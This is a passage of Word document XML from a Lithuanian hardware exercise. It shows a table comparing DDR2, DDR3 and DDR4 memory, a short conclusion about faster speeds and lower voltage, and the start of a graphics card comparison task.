          <w:p w14:paraId="3D3104C3" w14:textId="65C09389" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>533 - 800</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55484D4B" w14:textId="4E3EA9AA" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2133 - 5100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6C3B3C6C" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A33E6BF" w14:textId="2B04B134" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Perdavimo greitis (Transfer Rate GB/s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22752824" w14:textId="7FEFDD58" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4.2 - 6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9CCA9B" w14:textId="6D6F85F1" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8.5 - 14.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D471D37" w14:textId="51DB340C" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>17 - 21.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="31090DF0" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E1B4E3B" w14:textId="4EE98E75" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Įtampa (Voltage V)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8598EC" w14:textId="1666A898" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B86AC36" w14:textId="024D4120" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.35 - 1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027F5798" w14:textId="23C699B8" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7ED08947" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="595D7918" w14:textId="7B56D3D9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Atstumas nuo pradžios plokštelės iki išpjovos (cm)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CA2EFDD" w14:textId="5BF47550" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="343C0CF3" w14:textId="552F68D7" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E0F613C" w14:textId="16D5D12E" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7351FC79" w14:textId="77777777" w:rsidTr="00226B45">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5377" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DF68F78" w14:textId="300322B4" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1185D2FB" w14:textId="616F56A9" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E2A1FF" w14:textId="563E0F69" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B74650" w14:textId="1503F0AD" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2014</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299E2366" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00924E65" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77859498" w14:textId="1A8A82E2" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Išvados.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remiantis užpildyta lentele galima daryti išvadas, kad operatyvinės atminties gamintojai patobulino gaminimo technologijas, nes </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>didėjo perdavimo greitis</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DDR2</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> greitis</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>buvo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B86EA30" w14:textId="17D380C5" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4.2-6.4 GB/s,</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DDR3 8.5-14.9</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> GB/s.</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">DDR4 17-21.3 GB/s. Tarp DDR2 ir DDR3 yra tik </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>trejų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">metų skirtumas, o tarp DDR3 ir DDR4 </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>septynerių</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> metų</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sumažėjo įtampos</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuo 1.8 iki 1.2, o tai reiškia, kad ir elektros energijos naudoja</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ma</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mažiau. Atstumas nuo plokštelės</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pradžios</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> iki išpjovos skiriasi, </w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir tai padaryta</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tam, kad </w:t>
      </w:r>
      <w:r w:rsidR="07AC09FF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vartotojas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nesugadintų operatyvinės</w:t>
      </w:r>
      <w:r w:rsidR="3382C036" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> atminties</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, tiesiog nežinodamas to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220C3FF" w14:textId="77777777" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA7BA63" w14:textId="1FA648B3" w:rsidR="00ED6F79" w:rsidRPr="005A5C28" w:rsidRDefault="00ED6F79" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI KELIŲ GAMINTOJŲ VAIZDO PLOKŠTES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094AC08C" w14:textId="0430E978" w:rsidR="00E058DF" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMAS</w:t>
      </w:r>
      <w:r w:rsidR="00E058DF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="1EA8E69B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28073369" w14:textId="493FC19C" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="005F39ED" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzd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4"/>
        <w:gridCol w:w="3306"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="451EE6C1" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1665" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="289A99D3" w14:textId="7A3E6AED" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vaizdo plokštės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DFBC31B" w14:textId="6887B7C3" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>GeForce RTX 2080 Ti</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Founders Edition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="47FB61BA" w14:textId="525A2294" w:rsidR="564132E3" w:rsidRPr="005A5C28" w:rsidRDefault="564132E3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>AMD Radeon RX 6800 XT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7E589C94" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
